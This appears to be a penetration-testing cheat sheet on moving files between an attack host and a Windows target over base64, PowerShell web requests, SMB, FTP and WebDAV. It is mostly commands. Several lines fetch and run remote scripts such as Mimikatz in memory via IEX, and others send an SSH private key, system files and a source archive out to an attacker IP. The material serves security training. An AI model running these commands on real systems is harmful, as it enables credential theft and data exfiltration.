Base64 Download
Having access to a terminal, we can encode a file to a base64 string, and copy its contents from the terminal and perform the reverse operation, decoding the file in the original content.
It is important, however, to verify the integrity of the file , so using some sort of hashing algorithm should be used.
# obtain the md5 hash of the file to transfer
md5sum id_rsa
# encode to base64
cat id_rsa |base64 -w 0;echo
# decode base64 in PS
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1CRU..."))
# confirm the md5 hashes match in Windows
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5Powershell Web Downloads
Most companies also allow HTTP outbound traffic, but defenders can use Web filtering solutions to prevent access to specific websites or block the download of file types.
# powerhsell download files methods
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
# dowload files without blocking the calling thread
(New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
# Poweshell also supports fileless methods to run directly in memory (IEX)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/I
nvoke-Mimikatz.ps1')
# In some cases, Internet Explorer first-launch config has not been completed, which prevents the download. Can be bypassed
Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX
# SSL/TLS secure channel certificates is not trusted bypass
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')SMB Download
SMB is also a valid method of transfering files. It might involve creating the SMB sever and copying the file over.
# create smb server
sudo impacket-smbserver share -smb2support /tmp/smbshare
# create smb server with a username and password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
# moun the smb server with a username and password
net use n: \\192.168.220.133\share /user:test test
# copy a file from a smb server
copy \\192.168.220.133\share\nc.exeFTP Download
FTP can be used via the FTP client or Powershell Net.WebClient to download files from an FTP server.
# setting up a python3 ftp server
sudo python3 -m pyftpdlib --port 21
# transferring files from an FTP server using Powershell
(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')
# we may lack an interactice shell, so we can have all the comands in a file
(echo open 192.168.49.128 & echo USER anonymous & echo binary & echo GET file.txt & echo bye) > ftpcommand.txt & ftp -v -n -s:ftpcommand.txtBase64 Upload
There may also be situations where we must upload files from our target machine into our attack host. We use the same methods we used for download operation but now for uploads.
# get base64 file in PS
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
# Get md5 hash on the target host
Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select Hash
# decode base64 string in linux
echo IyBDb3B5... | base64 -d > hosts
# verify signature
md5sum hostsPowershell Web Uploads
Powershell doesn’t have any built-in upload operations.
# install and run a WebServer with Upload
pip3 install uploadserver
python3 -m uploadserver
# Powershell script to upload a file to python upload server
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
# Base64 web upload
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
# fetch the base64 data
nc -lvnp 8000SMB Uploads over WebDAV
Most enterprises don’t allow SMB protocol out of their internal network because this can open them up to potential attacks. An alternative is to run SMB over HTTP via WebDAV (which enables a websever to behave like a fileserver).
# install the necessary python modules on the attacking machine
sudo pip3 install wsgidav cheroot
# running them
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
# connecting the webDAV share
dir \\192.168.49.128\DavWWWRoot
# Upload files
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\FTP Uploads
# specify the option to allow clients to upload
sudo python3 -m pyftpdlib --port 21 --write
# powershell upload the file
(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
# create a command file to upload a file
(echo open 192.168.49.128 & echo USER anonymous & echo binary & echo PUT c:\windows\system32\drivers\etc\hosts & echo bye) > ftpcommand.txt & ftp -v -n -s:ftpcommand.txtFile Encryption
Controls may be put in place to block the exfiltration of sensitive data, therefore, penetration testers must leverage encryption to transfer files.
Living off the land binaries exist that allow attackers to perform actions beyond their original purpose.
# import the AES encryption script
Import-Module .\Invoke-AESEncryption.ps1
# Encrypt a file
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\scan-results.txt